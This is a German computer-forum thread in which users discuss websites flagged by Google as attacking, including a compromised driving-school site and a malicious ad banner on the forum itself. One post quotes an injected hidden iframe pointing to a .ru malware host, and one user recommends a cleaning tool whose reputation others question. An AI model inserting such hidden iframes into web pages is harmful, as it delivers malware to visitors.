TweakPC

Zurück   Computer Hardware Forum - TweakPC > TweakPC Community > Feedback & Fragen an die Crew
Registrieren Hilfe Community Downloads

Thema geschlossen
 
LinkBack Themen-Optionen Ansicht
Alt 15.06.2009, 16:59   #1 (permalink)
Rechenknecht
 

Registriert seit: 29.12.2005
Beiträge: 96

Speedfighter ist zur Zeit noch ein unbeschriebenes Blatt

Standard Als attackierend gemeldete Website!

Hallo Leute,

wahrscheinlich gibts schon nen thread über dieses thema, hab aber nach benutzen der suchfunktion nix gefunden.

Das problem ist ganz einfach:

ich hab für ne fahrschule die aktualisierung der website übernommen.

vor kurzem hab ich ein pdf-file zum ansehen bereitgestellt.

ein paar tage später schau ich wieder auf die seite und dann kommt die Meldung:

Als attackierend gemeldete Website!

Die Website auf sos-fahrschule.de wurde als attackierende Seite gemeldet und auf Grund Ihrer Sicherheitseinstellungen blockiert.


Attackierende Websites versuchen, Programme zu installieren, die private Informationen stehlen, Ihren Computer verwenden, um andere zu attackieren oder Ihr System beschädigen.

Manche Websites vertreiben bewusst Viren und ähnlich schädliche Software, aber viele Websites sind auch ohne das Wissen oder die Erlaubnis des Betreibers kompromittiert.


Aufgrund dessen hab ich die komplette homepage vom server gelöscht und nur provisorisch eine seite reingestellt auf der steht dass die HP neu aufgebaut wird.

natürlich hab ich auch die ganzen hilfen inanspruch genommen, die google einem bietet. das problem ist:

die meldung wird immer noch angezeigt.

wie kann das sein? ich hab doch da tabula rasa gemacht.....

achja, ich kann irgendwie die seite nicht erneut prüfen lassen, obwohl ich mich durch einen link, den man auf seine seite setzen muss, schon registriet habe.

hoffentlich kommt einem von euch da draußen das bekannt vor, oder hat eine idee.

achja, die seite heißt sos-fahrschule.de und liegt bei strato

vielen dank im vorraus.



Geändert von Speedfighter (15.06.2009 um 18:15 Uhr)
Speedfighter ist offline  
Alt 15.06.2009, 18:28   #2 (permalink)
Hardware Freak
 
Benutzerbild von chrisr15
 

Registriert seit: 23.05.2004
Beiträge: 5.498

chrisr15 ist ein wunderbarer Anblickchrisr15 ist ein wunderbarer Anblickchrisr15 ist ein wunderbarer Anblickchrisr15 ist ein wunderbarer Anblickchrisr15 ist ein wunderbarer Anblickchrisr15 ist ein wunderbarer Anblick

Standard AW: Als attackierend gemeldete Website!

Da hat es wohl Sicherheitslücken im Code gegeben, bzw. dein Rechner ist infiziert:
Google Safe Browsing-Diagnoseseite für sos-fahrschule.de
chrisr15 ist offline  
Alt 16.06.2009, 11:52   #3 (permalink)
Rechenknecht
 

Registriert seit: 29.12.2005
Beiträge: 96

Speedfighter ist zur Zeit noch ein unbeschriebenes Blatt

Standard AW: Als attackierend gemeldete Website!

aha, dann müsste es ja hinhaun wenn ich eine provisorische seite auf einem anderen pc entwerfe und diese dann hochlade...seh ich das richtig???
Speedfighter ist offline  
Alt 16.06.2009, 12:33   #4 (permalink)
Hardware Freak
 

Registriert seit: 28.03.2003
Beiträge: 8.252

redfalcon kann auf vieles stolz sein
redfalcon kann auf vieles stolz sein

Standard AW: Als attackierend gemeldete Website!

Zitat:
Zitat von Speedfighter Beitrag anzeigen
aha, dann müsste es ja hinhaun wenn ich eine provisorische seite auf einem anderen pc entwerfe und diese dann hochlade...seh ich das richtig???
...und vielleicht mal die Zugangsdaten und Kennwörter überprüfst und entsprechend (und SICHER) ändern. Ich weiss ja nicht was auf dem Webspace noch läuft (PHP/SQL?), falls du das nicht nutzt würde ichs abstellen.
redfalcon ist offline  
Alt 17.06.2009, 06:57   #5 (permalink)
Rechenknecht
 

Registriert seit: 29.12.2005
Beiträge: 96

Speedfighter ist zur Zeit noch ein unbeschriebenes Blatt

Standard AW: Als attackierend gemeldete Website!

Das Passwort hab ich schon geändert...wie meinst du das mit
"ich weiss ja nicht was auf dem Webspace noch läuft (PHP/SQL?), falls du das nicht nutzt würde ichs abstellen." ich kann dir aber versichern dass außer dieser einen hmtl datei nichts auf dem server vorhanden ist.
Speedfighter ist offline  
Alt 17.06.2009, 08:41   #6 (permalink)
Hardware Freak
 

Registriert seit: 28.03.2003
Beiträge: 8.252

redfalcon kann auf vieles stolz sein
redfalcon kann auf vieles stolz sein

Standard AW: Als attackierend gemeldete Website!

Bietet Strato noch PHP-Fähigkeit und SQL-Datenbanken für den Webspace an?
redfalcon ist offline  
Alt 17.06.2009, 09:40   #7 (permalink)
semi-diabolisch
 
Benutzerbild von [EID]-Mr.GiZMO
 

Registriert seit: 12.09.2005
Beiträge: 2.922

[EID]-Mr.GiZMO kann auf vieles stolz sein[EID]-Mr.GiZMO kann auf vieles stolz sein[EID]-Mr.GiZMO kann auf vieles stolz sein[EID]-Mr.GiZMO kann auf vieles stolz sein[EID]-Mr.GiZMO kann auf vieles stolz sein[EID]-Mr.GiZMO kann auf vieles stolz sein[EID]-Mr.GiZMO kann auf vieles stolz sein[EID]-Mr.GiZMO kann auf vieles stolz sein[EID]-Mr.GiZMO kann auf vieles stolz sein

Standard AW: Als attackierend gemeldete Website!

Was hast du für ein Webspacepaket? Bei Strato kann man an hand dessen sehen, ob PHP/MySQL dabei ist.
War mein Post nützlich für dich? Ein Danke oder eine Bewertung sind immer schön.
Teilnehmer der Initiative "User verbessern Qualität im Forum" | Meine Systeme

Darf ich mal bitte vorbei?! Das geht nach Kompetenz... Danke! | | | Einmal dachte ich, ich hätte Unrecht. Hab mich aber getäuscht!
"Es ist gelogen, dass Videogames Kids beeinflussen. Hätte Pacman das getan, würden wir heute durch dunkle Räume irren, Pillen fressen und elektronische Musik hören."

[EID]-Mr.GiZMO ist offline  
Alt 17.06.2009, 16:51   #8 (permalink)
Rechenknecht
 

Registriert seit: 29.12.2005
Beiträge: 96

Speedfighter ist zur Zeit noch ein unbeschriebenes Blatt

Standard AW: Als attackierend gemeldete Website!

also ich kann hier bei der paketbeschreibung nichts von php oder sql lesen.

das Paket heißt: STRATO DynamiX
Speedfighter ist offline  
Alt 30.08.2009, 00:47   #9 (permalink)
The real MacGyver
 
Benutzerbild von Fakk-asrock
 

Registriert seit: 10.02.2005
Beiträge: 5.762

Fakk-asrock ist ein wunderbarer AnblickFakk-asrock ist ein wunderbarer AnblickFakk-asrock ist ein wunderbarer AnblickFakk-asrock ist ein wunderbarer AnblickFakk-asrock ist ein wunderbarer AnblickFakk-asrock ist ein wunderbarer AnblickFakk-asrock ist ein wunderbarer AnblickFakk-asrock ist ein wunderbarer Anblick

Standard AW: Als attackierend gemeldete Website!

Als attackierend gemeldete Website!

Ich hab das gleiceh Problem gehabt auf meiner Strato-Seite!!
2 Dateien verändert. index.html wurde mit nem ..xxx.ru zugriff versehen, zusätzlich wurde eine home.html erstellt. ansonsten nix verändert.

ich habe Strato angehaun wie das sein kann (ich hab auf den Webspace seit nem halben Jahr nicht zugegriffen etc) aber die wollten mir nicht helfen. Änderungsdatum der Dateien: 09.08.2009.
mitlerweile wieder alles clean - Webseite bei Google angemeldet und zur erneuten Überprüfung in dei Warteschalnge gesteckt. Das ganze war vor einer Woche (war im Urlaub).

Heute Warnt mich Google vor meiner eigenen Webseite. alle Index HTMLs wurden verändert:

Zitat:
Malicious software includes 1 trojan(s).
Die Malware wird in 1 Domain(s) gehostet, darunter 3fb.ru/.
This site was hosted on 1 network(s) including AS13301 (UNITEDCOLO).
die seite liegt nicht bei strato.

Zitat:
<iframe src="http://f5x.ru:8080/index.php" width=141 height=112 style="visibility: hidden"></iframe>
Fakk-asrock ist offline  
Alt 30.08.2009, 11:33   #10 (permalink)
Rechenknecht
 

Registriert seit: 29.12.2005
Beiträge: 96

Speedfighter ist zur Zeit noch ein unbeschriebenes Blatt

Standard AW: Als attackierend gemeldete Website!

hi Fakk-asrock,

ich hab das problem nach langem recherchieren endlich gelöst.
der fehler ist: dein PC ist "verseucht"

ich wollts mir am anfang auch nicht eingestehen weil ich auch genug virensoftware hatte. das programm das mir dann schließlich geholfen hat, nennt sich malware sweeper. hab jetz grad keinen link, suchs auf ZDNet.de - Alle Seiten der IT oder CHIP Online - Deutschlands größtes Computer Portal. sag mir bitte obs funktioniert hat, würd mich interessieren.

gruß

Tobi
Speedfighter ist offline  
Alt 30.08.2009, 11:53   #11 (permalink)
The real MacGyver
 
Benutzerbild von Fakk-asrock
 

Registriert seit: 10.02.2005
Beiträge: 5.762

Fakk-asrock ist ein wunderbarer AnblickFakk-asrock ist ein wunderbarer AnblickFakk-asrock ist ein wunderbarer AnblickFakk-asrock ist ein wunderbarer AnblickFakk-asrock ist ein wunderbarer AnblickFakk-asrock ist ein wunderbarer AnblickFakk-asrock ist ein wunderbarer AnblickFakk-asrock ist ein wunderbarer Anblick

Standard AW: Als attackierend gemeldete Website!

http://derpublisher.de.funpic.de/FaK...%20sweeper.gif

nein ^^.

naja ich lass schon stingerm hijackthis und ad-aware hin und wieder rüberlaufen.
Fakk-asrock ist offline  
Alt 30.08.2009, 12:05   #12 (permalink)
Hardware Freak
 
Benutzerbild von swatcher1
 

Registriert seit: 10.04.2002
Beiträge: 7.867

swatcher1 kann auf vieles stolz seinswatcher1 kann auf vieles stolz seinswatcher1 kann auf vieles stolz seinswatcher1 kann auf vieles stolz seinswatcher1 kann auf vieles stolz seinswatcher1 kann auf vieles stolz seinswatcher1 kann auf vieles stolz seinswatcher1 kann auf vieles stolz sein

Standard AW: Als attackierend gemeldete Website!

Ehm... wenn "malware sweeper" etwas taugen würde so hätte die Seite mMn NIEMALS eine so schlechte Bewertung im Web of trust... siehe hier:

malwaresweeper.com | WOT-Sicherheitswertungsliste | WOT Web of Trust

Käme mir nicht auf den PC ^^

greetz
Ich brauche keinen Sex; das Leben f.i.c.k.t mich bereits wo es nur kann...
Daher ironiere ich einfach so lange, bis ich einen Sarkasmus habe!


HEADS I win, tails you lose... | https://www.tweakpc.de/forum/members...ture94-sig.gif
swatcher1 ist offline  
Alt 31.08.2009, 14:19   #13 (permalink)
Rechenknecht
 

Registriert seit: 29.12.2005
Beiträge: 96

Speedfighter ist zur Zeit noch ein unbeschriebenes Blatt

Standard AW: Als attackierend gemeldete Website!

hmm, das is komisch.
mir is das programm von 2 leuten empfohlen worden die Informatik studiert haben. aber wenn du mal auf die seite schaust, siehst du eigentlich recht gute kommentare. vielleicht haben die leute von WOT ne andere version bewertet. aber da kann man ja jetz drüber streiten (worauf ich aber jetzt keine lust hab).

fakt ist einfach, dass ich mit dem programm meine 2 websites wieder zum laufen gebracht hab. (die waren beide von google gesperrt).
also meiner meinung nach ist das programm ganz in ordnung. ein paar leute die auf der website WOT malware sweeper bewertet haben kann ich nicht verstehen. mich hat das programm noch nie gefragt ob ich was kaufen will.

gruß
Speedfighter ist offline  
Alt 22.11.2010, 18:29   #14 (permalink)
Neuling
 
Benutzerbild von skyline85gtr
 

Registriert seit: 19.11.2010
Beiträge: 3

skyline85gtr befindet sich auf einem aufstrebenden Ast

Standard AW: Als attackierend gemeldete Website!

Hallo, wollte gerade hier ins Forum und bekomme eine Malware Warnung. Das komische ist: nicht nur Firefox meldet diese Warnung sondern auch Google.

Hab ich jetzt nen Denkfehler oder ist das irgendwas mit Tweak PC passiert ?

http://s10.directupload.net/images/1...p/7ek6pnl3.jpg
http://s5.directupload.net/images/10...p/kxbg7k6e.jpg

http://s3.directupload.net/images/10...p/blt7nkgw.jpg
skyline85gtr ist offline  
Alt 22.11.2010, 18:39   #15 (permalink)
Hardware Freak
 
Benutzerbild von Mother-Brain
 

Registriert seit: 19.01.2009
Beiträge: 10.755

Mother-Brain ist ein wunderbarer AnblickMother-Brain ist ein wunderbarer AnblickMother-Brain ist ein wunderbarer AnblickMother-Brain ist ein wunderbarer AnblickMother-Brain ist ein wunderbarer AnblickMother-Brain ist ein wunderbarer AnblickMother-Brain ist ein wunderbarer Anblick

Standard AW: Als attackierend gemeldete Website!

http://www.tweakpc.de/forum/feedback...-webseite.html

Mother-Brain ist offline  
Alt 22.11.2010, 18:39   #16 (permalink)
Extrem Performer
 
Benutzerbild von BloodPrince
 

Registriert seit: 27.01.2009
Beiträge: 1.172

BloodPrince wird schon bald berühmt werdenBloodPrince wird schon bald berühmt werden

Standard AW: Als attackierend gemeldete Website!

genau das gleiche hab ich auch. Ständig kommt das bei Tweak pc seit heute ? ! ?
BloodPrince ist offline  
Alt 22.11.2010, 18:40   #17 (permalink)
Mayday 2023
 
Benutzerbild von Raffnix
 

Registriert seit: 08.11.2002
Beiträge: 2.247

Raffnix ist ein wunderbarer AnblickRaffnix ist ein wunderbarer AnblickRaffnix ist ein wunderbarer AnblickRaffnix ist ein wunderbarer AnblickRaffnix ist ein wunderbarer AnblickRaffnix ist ein wunderbarer AnblickRaffnix ist ein wunderbarer Anblick

Standard AW: Als attackierend gemeldete Website!

Ich bekomme auch eine Meldung, tweakpc.de wäre eine attackierende Seite. Das glaube ich aber weniger, deshalb ignoriere ich das. Zudem kommt die Info, wer attackiert, von Google. Und die sind mit eh nicht ganz koscher. Es kann aber sein, das ein Ad, das auch tweakpc.de angezeigt wird, "böse" ist. Das ist aber etwas anderes. Auf jeden Fall muss/sollte der Betreiber der Seite aktiv werden.

User Tracking ist kein Bagatelldelikt!
Hopfen und Malz erleichtern die Balz!


Raffnix ist offline  
Alt 22.11.2010, 18:41   #18 (permalink)
Hardware Freak
 
Benutzerbild von Mother-Brain
 

Registriert seit: 19.01.2009
Beiträge: 10.755

Mother-Brain ist ein wunderbarer AnblickMother-Brain ist ein wunderbarer AnblickMother-Brain ist ein wunderbarer AnblickMother-Brain ist ein wunderbarer AnblickMother-Brain ist ein wunderbarer AnblickMother-Brain ist ein wunderbarer AnblickMother-Brain ist ein wunderbarer Anblick

Standard AW: Als attackierend gemeldete Website!

arghh nicht meinen Post überlesen, weil er auf der ersten Seite steht:

http://www.tweakpc.de/forum/feedback...-webseite.html

Steht doch alles dadrin, ist schon gemeldet und es wurde sich um das Problem gekümmert.
Mother-Brain ist offline  
Alt 22.11.2010, 18:42   #19 (permalink)
Extrem Tweaker
 
Benutzerbild von Pilzkopf
 

Registriert seit: 14.03.2006
Beiträge: 2.409

Pilzkopf ist ein wunderbarer AnblickPilzkopf ist ein wunderbarer AnblickPilzkopf ist ein wunderbarer AnblickPilzkopf ist ein wunderbarer AnblickPilzkopf ist ein wunderbarer AnblickPilzkopf ist ein wunderbarer AnblickPilzkopf ist ein wunderbarer AnblickPilzkopf ist ein wunderbarer Anblick

Standard AW: Als attackierend gemeldete Website!

Les einfach 4 Beiträge vorher.

Zusammenfassend:
Ein Werbebanner war verseucht, darum die Meldung durch Google, also google warnt schon berechtigt.

Robert hat das Banner aber entfernt und die Seite ist wieder sauber.
http://hwbot.org/signature/u31911.png

Main Rig: Phenom X4 955BE @ Stock | 4GB DDR3 1066 GEIL RipJAWS | Biostar TA890FXE | XFX ATI Radeon HD5770 1GB | Windows 7
Ausweich PC: AMD Athlon XP 2400+ | ECS K7S5A | ELSA Erazor III 32MB | Windows XP
Pilzkopf ist offline  
Alt 22.11.2010, 18:57   #20 (permalink)
Bitte nicht füttern!
 
Benutzerbild von Robert
 

Registriert seit: 22.01.2002
Beiträge: 15.724

Robert kann auf vieles stolz seinRobert kann auf vieles stolz seinRobert kann auf vieles stolz seinRobert kann auf vieles stolz seinRobert kann auf vieles stolz seinRobert kann auf vieles stolz seinRobert kann auf vieles stolz seinRobert kann auf vieles stolz seinRobert kann auf vieles stolz sein

Standard AW: Als attackierend gemeldete Website!

Zitat:
Zitat von Raffnix Beitrag anzeigen
Ich bekomme auch eine Meldung, tweakpc.de wäre eine attackierende Seite. Das glaube ich aber weniger, deshalb ignoriere ich das. Zudem kommt die Info, wer attackiert, von Google. Und die sind mit eh nicht ganz koscher. Es kann aber sein, das ein Ad, das auch tweakpc.de angezeigt wird, "böse" ist. Das ist aber etwas anderes. Auf jeden Fall muss/sollte der Betreiber der Seite aktiv werden.
Hallo,

das Problem wurde bereits beseitigt, leider dauert die Freischaltung durch google, das diese Meldung verschwindet bis zu 24 Stunden :/

Es hat sich ein fieser Banner Anhang mit angehängtem Schadcode bei uns eingeschleust Sobald dieser Banner angezeigt wurde wurde versucht von einer anderen Seite irgendwas zu starten.

Bei uns selbst auf der Seite war aber nichts.
Webmaster / Forumadmin [TweakPC Team]
"It is far easier to concentrate power than to concentrate knowledge." Thomas Sowell
Robert ist offline  
Alt 22.11.2010, 19:03   #21 (permalink)
Extrem Tweaker
 
Benutzerbild von Pilzkopf
 

Registriert seit: 14.03.2006
Beiträge: 2.409

Pilzkopf ist ein wunderbarer AnblickPilzkopf ist ein wunderbarer AnblickPilzkopf ist ein wunderbarer AnblickPilzkopf ist ein wunderbarer AnblickPilzkopf ist ein wunderbarer AnblickPilzkopf ist ein wunderbarer AnblickPilzkopf ist ein wunderbarer AnblickPilzkopf ist ein wunderbarer Anblick

Standard AW: Als attackierend gemeldete Website!

Mal ne Frage (ich würd ja selbst nachgucken, aber Robert hat ihn ja schon beseitigt :P):
Hat noch wer den Schadcode an sich?
Bzw Details was es genau war?
Pilzkopf ist offline  
Alt 22.11.2010, 19:07   #22 (permalink)
Hardware Freak
 
Benutzerbild von poloniumium
 

Registriert seit: 23.03.2009
Beiträge: 10.311

poloniumium ist ein wunderbarer Anblickpoloniumium ist ein wunderbarer Anblickpoloniumium ist ein wunderbarer Anblickpoloniumium ist ein wunderbarer Anblickpoloniumium ist ein wunderbarer Anblickpoloniumium ist ein wunderbarer Anblickpoloniumium ist ein wunderbarer Anblick

Standard AW: Als attackierend gemeldete Website!

ich glaube der fehler ist gerade verschwunden, oder ff hat das ignorieren verinnerlicht.
yipppie
poloniumium ist offline  
Alt 22.11.2010, 19:12   #23 (permalink)
Bitte nicht füttern!
 
Benutzerbild von Robert
 

Registriert seit: 22.01.2002
Beiträge: 15.724

Robert kann auf vieles stolz seinRobert kann auf vieles stolz seinRobert kann auf vieles stolz seinRobert kann auf vieles stolz seinRobert kann auf vieles stolz seinRobert kann auf vieles stolz seinRobert kann auf vieles stolz seinRobert kann auf vieles stolz seinRobert kann auf vieles stolz sein

Standard AW: Als attackierend gemeldete Website!

Bei mir noch nicht, Google webmastertools sagt die Seite wird noch überprüft



--> da gehts weiter
http://www.tweakpc.de/forum/feedback...-webseite.html
Robert ist offline  
Thema geschlossen

Stichworte
attackierend, gemeldete, website


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 

Forumregeln
Es ist dir erlaubt, neue Themen zu verfassen.
Es ist dir erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist aus.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Website Hirbel Netzwerk 16 20.01.2005 14:13
Suchfunktion für Website Rabe Programmiersprachen 23 04.05.2004 18:37
Bilder Vorschau für Website Buschfunker Windows & Programme 4 31.01.2004 12:31


Alle Zeitangaben in WEZ +1. Es ist jetzt 04:31 Uhr.






Powered by vBulletin® Version 3.8.10 (Deutsch)
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
SEO by vBSEO 3.5.2 ©2010, Crawlability, Inc.
Impressum, Datenschutz Copyright © 1999-2015 TweakPC, Alle Rechte vorbehalten, all rights reserved